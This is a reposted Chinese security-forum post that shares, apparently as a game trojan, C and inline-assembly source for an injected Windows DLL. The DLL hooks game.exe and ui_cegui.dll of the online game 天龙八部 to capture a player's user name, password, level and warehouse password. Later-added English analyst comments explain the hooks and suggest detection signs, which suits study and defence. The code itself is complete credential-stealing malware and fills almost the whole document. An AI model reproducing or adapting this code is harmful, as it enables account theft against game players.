
天龙八部***核心代码

2012-02-15 09:05 246 查看
天龙八部***核心代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

文章作者:认真的雪

我也来凑凑热闹.....

发一个网游***核心代码...无聊的时候写的..

截取了用户名,密码,等级,仓库密码

代码:

#include <windows.h>

// Analyst note: each *Code array is a byte pattern that the Hook* functions
// search for in a loaded module, and each *JmpCode array is the 6-byte patch
// written over the match. 0xE9 is the x86 near-jump opcode, the four zero bytes
// are filled in with a relative offset at runtime, and 0x90 (NOP) pads the
// patch to 6 bytes. The patterns themselves are usable as static indicators
// when triaging similar samples.
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};

BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};

BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};

// Receives the 6 bytes that HookStroe overwrites, so StroeUnhook can copy them back.
BYTE oldStoreCode[6]={0};

BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

// Address of the private copy of ui_cegui.dll (written by CmpFlag via HookGrade).
DWORD ui_cegui;

// Continuation addresses used by the naked stubs' final jmp; set by the scan
// functions to the matched location inside the private module copy.
void *lpUserRet=NULL;

void *lpGradeRet=NULL;

void *lpStoreRet=NULL;

// Captured values are held in these fixed-size globals; GetUserBuff and
// GetStoreBuff fill the string buffers with strcpy (no length check).
char user[40];

char pass[40];

char storePassWord[40];

DWORD dwGrade;

// Address of the patched location in ui_cegui.dll; 0 means no patch is recorded.
DWORD stroePath=0;

void _stdcall StroeUnhook();

void _stdcall HookStroe();

/*
 * Analyst note: signature scan over a private copy of a loaded module.
 *
 * Looks up moduleName with GetModuleHandle (message box and return 0 on
 * failure), reads the image size from the module's in-memory PE headers (the
 * DWORD at e_lfanew + 0x50, which is SizeOfImage in a 32-bit optional header),
 * allocates a PAGE_EXECUTE_READWRITE region of that size and copies the whole
 * image into it. The address of the copy is returned through lpModule.
 *
 * The copy is then scanned byte by byte for the len-byte pattern `flag`. On
 * the first match, *lpRet receives the match address inside the copy and the
 * return value is the corresponding address inside the loaded module
 * (offset + module base). Returns 0 when nothing matches.
 *
 * Pointers are cast to DWORD throughout, so the code assumes a 32-bit process.
 *
 * Detection: a private, writable and executable region whose contents
 * duplicate a loaded image is an anomaly that memory-forensics tooling can
 * flag; the region is never freed in this listing.
 */
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)

{

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL)

{

::MessageBox(NULL,"获取模块错误","failed",0);

return 0;

}

// 0x3c is e_lfanew in the DOS header; +0x50 from the NT headers is SizeOfImage (PE32).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);

void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

*lpModule=(DWORD)newModule;

memcpy(newModule,(void*)hModule,imageSize);

for(DWORD i=0;i<imageSize;i++)

{

buff=(BYTE*)((DWORD)newModule+i);

if(memcmp(buff,flag,len)==0)

{

// *lpRet points into the copy; the return value points into the live module.
*lpRet=(void*)buff;

return i+(DWORD)hModule;

}

}

return 0;

}

/*
 * Analyst note: same signature scan as CmpFlag, but over an existing copy.
 *
 * newModule is the address of a module copy made earlier (HookStroe passes the
 * global ui_cegui). No memory is allocated here. The image size is read again
 * from the live module's PE headers, and the copy is scanned for the len-byte
 * pattern `flag`. On a match, *lpRet receives the match address inside the
 * copy and the return value is the corresponding address in the loaded module.
 * Returns 0 if the module is not loaded (after a message box) or the pattern
 * is not found.
 */
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)

{

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL)

{

::MessageBox(NULL,"获取模块错误","failed",0);

return 0;

}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);

for(DWORD i=0;i<imageSize;i++)

{

buff=(BYTE*)(newModule+i);

if(memcmp(buff,flag,len)==0)

{

*lpRet=(void*)buff;

return i+(DWORD)hModule;

}

}

return 0;

}

/*
 * Analyst note: copies the two strings handed over by the GetUserAndPass stub
 * into the globals `user` and `pass`. strcpy is used without a length check
 * against the 40-byte destination buffers.
 */
void _stdcall GetUserBuff(char *userName,char *passWord)

{

strcpy(user,userName);

strcpy(pass,passWord);

return;

}

/*
 * Analyst note: naked detour stub reached through the 6-byte jump that
 * HookUserAndPass writes into game.exe.
 *
 * It saves eax, pushes the DWORD at [ebp+0xC] and then ecx as the two stdcall
 * arguments of GetUserBuff (by push order, ecx lands in userName and the
 * [ebp+0xC] value in passWord), calls StroeUnhook, restores eax and jumps
 * through lpUserRet. lpUserRet was set by CmpFlag to the matched location
 * inside the private copy of the module, so execution continues from the copy.
 *
 * What the two values hold at runtime depends on the patched game code, which
 * is not part of this listing; the author describes them as user name and
 * password.
 */
__declspec(naked)void GetUserAndPass()

{

_asm

{

push eax;

mov eax,dword ptr ss:[ebp+0xC];

push eax;

push ecx;

call GetUserBuff;

call StroeUnhook;

pop eax;

jmp [lpUserRet];

}

}

/* Analyst note: stores the value handed over by the GetGrade stub in the global dwGrade. */
void _stdcall GetGradeDword(DWORD grade)

{

dwGrade=grade;

return;

}

/*
 * Analyst note: naked detour stub reached through the jump that HookGrade
 * writes into ui_cegui.dll.
 *
 * It saves all general-purpose registers (pushad), passes ebx to
 * GetGradeDword, calls HookStroe to install the third patch, restores the
 * registers and jumps through lpGradeRet, which points at the matched location
 * inside the private copy of ui_cegui.dll.
 */
__declspec(naked)void GetGrade()

{

_asm

{

pushad;

push ebx;

call GetGradeDword;

call HookStroe;

popad;

jmp [lpGradeRet];

}

}

/*
 * Analyst note: writes the 6 bytes saved in oldStoreCode back to stroePath.
 *
 * Does nothing while stroePath is 0. Otherwise it calls VirtualProtect on
 * 7 bytes at stroePath requesting PAGE_READWRITE, copies the saved bytes back,
 * and calls VirtualProtect a second time with mbi.Protect as the requested
 * protection. stroePath is not reset afterwards.
 *
 * Detection: protection changes on pages of a mapped image, and code bytes
 * that change and change back during a session, are observable to integrity
 * monitoring even though the patch is transient.
 */
void _stdcall StroeUnhook()

{

if(stroePath==0)

return;

MEMORY_BASIC_INFORMATION mbi;

VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);

memcpy((void*)stroePath,oldStoreCode,6);

VirtualProtect((void*)stroePath,7,mbi.Protect,0);

return;

}

/*
 * Analyst note: final collection step, called from the GetStore stub.
 *
 * Copies storePass into the global storePassWord (strcpy, no length check),
 * formats the four captured values (user, pass, dwGrade, storePassWord) into a
 * 256-byte stack buffer with wsprintf and shows them in a message box.
 *
 * No network or file output appears in this listing; the captured values are
 * only displayed locally.
 */
void _stdcall GetStoreBuff(char *storePass)

{

strcpy(storePassWord,storePass);

char data[256];

wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);

}

/*
 * Analyst note: naked detour stub reached through the jump that HookStroe
 * writes into ui_cegui.dll.
 *
 * It saves all general-purpose registers, passes ecx to GetStoreBuff, calls
 * StroeUnhook to copy the saved bytes back over the patch, restores the
 * registers and jumps through lpStoreRet (a location inside the private copy
 * of ui_cegui.dll, set in HookStroe).
 */
__declspec(naked)void GetStore()

{

_asm

{

pushad;

push ecx;

call GetStoreBuff;

call StroeUnhook;

popad;

jmp [lpStoreRet];

}

}

/*
 * Analyst note: installs the third inline patch, in ui_cegui.dll.
 *
 * Searches the existing private copy of ui_cegui.dll (global ui_cegui) for the
 * 9-byte storeCode pattern via GetRealFlag and returns if it is not found.
 * Both the live address (stroePath) and the continuation address in the copy
 * (lpStoreRet) are then advanced by 0x43. The relative offset from the end of
 * a 5-byte jump at stroePath to GetStore is written into storeJmpCode, the
 * 6 bytes currently at stroePath are saved to oldStoreCode, and the jump is
 * copied over them between two VirtualProtect calls.
 *
 * Detection: after this runs, 6 bytes of ui_cegui.dll's mapped image differ
 * from the file on disk and begin with 0xE9; comparing in-memory code with the
 * on-disk image exposes the patch while it is in place.
 */
void _stdcall HookStroe()

{

stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);

if(stroePath==0)

return ;

stroePath=stroePath+0x43;

lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);

// rel32 operand of the jump: target minus the address following the 5-byte jmp.
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);

*(DWORD*)(&storeJmpCode[1])=jmpAddress;

memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi;

VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);

memcpy((void*)stroePath,storeJmpCode,6);

VirtualProtect((void*)stroePath,7,mbi.Protect,0);

return;

}

/*
 * Analyst note: installs the second inline patch, in ui_cegui.dll.
 *
 * CmpFlag makes a private copy of ui_cegui.dll (its address is stored in the
 * global ui_cegui), finds the 6-byte gradeCode pattern and sets lpGradeRet to
 * the match inside the copy. If the pattern is found, the relative offset to
 * GetGrade is written into gradeJmpCode and the 6-byte jump is copied over the
 * matched bytes in the live module between two VirtualProtect calls. The
 * overwritten bytes are not saved here.
 *
 * Detection: the patched bytes in the mapped image no longer match the file on
 * disk, which code-integrity comparison of loaded modules will show.
 */
void HookGrade()

{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);

if(passPath==0)

return ;

// rel32 operand of the jump: target minus the address following the 5-byte jmp.
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);

*(DWORD*)(&gradeJmpCode[1])=jmpAddress;

MEMORY_BASIC_INFORMATION mbi;

VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);

memcpy((void*)passPath,gradeJmpCode,6);

VirtualProtect((void*)passPath,7,mbi.Protect,0);

}

/*
 * Analyst note: installs the first inline patch, in game.exe.
 *
 * CmpFlag makes a private copy of game.exe (the copy's address goes to the
 * local hModule and is not used again), finds the 7-byte userCode pattern and
 * sets lpUserRet to the match inside the copy. If the pattern is found, the
 * relative offset to GetUserAndPass is written into userJmpCode and the 6-byte
 * jump is copied over the matched bytes in the live module between two
 * VirtualProtect calls. The overwritten bytes are not saved here.
 *
 * Detection: the patched bytes in the mapped image no longer match the file on
 * disk, which code-integrity comparison of the main executable will show.
 */
void HookUserAndPass()

{

DWORD hModule;

DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);

if(passPath==0)

return ;

// rel32 operand of the jump: target minus the address following the 5-byte jmp.
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);

*(DWORD*)(&userJmpCode[1])=jmpAddress;

MEMORY_BASIC_INFORMATION mbi;

VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);

memcpy((void*)passPath,userJmpCode,6);

VirtualProtect((void*)passPath,7,mbi.Protect,0);

}

/*
 * Analyst note: worker thread body started from DllMain. It installs the
 * game.exe patch and then the first ui_cegui.dll patch, and returns 0.
 * lpParam is unused.
 */
DWORD WINAPI Thread(LPVOID lpParam)

{

HookUserAndPass();

HookGrade();

return 0;

}

/*
 * Analyst note: DLL entry point. On DLL_PROCESS_ATTACH it starts a new thread
 * running Thread(); the handle returned by CreateThread is not stored or
 * closed. All other notifications are ignored and TRUE is always returned.
 *
 * How the DLL is brought into the target process is not shown in this listing.
 * Detection: an unexpected module appearing in the game process, followed by a
 * new thread whose start address lies inside that module, is the earliest
 * observable event in this chain.
 */
BOOL APIENTRY DllMain( HANDLE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

switch(ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:

{

DWORD ThreadId;

CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);

break;

}

default:break;

}

return TRUE;

}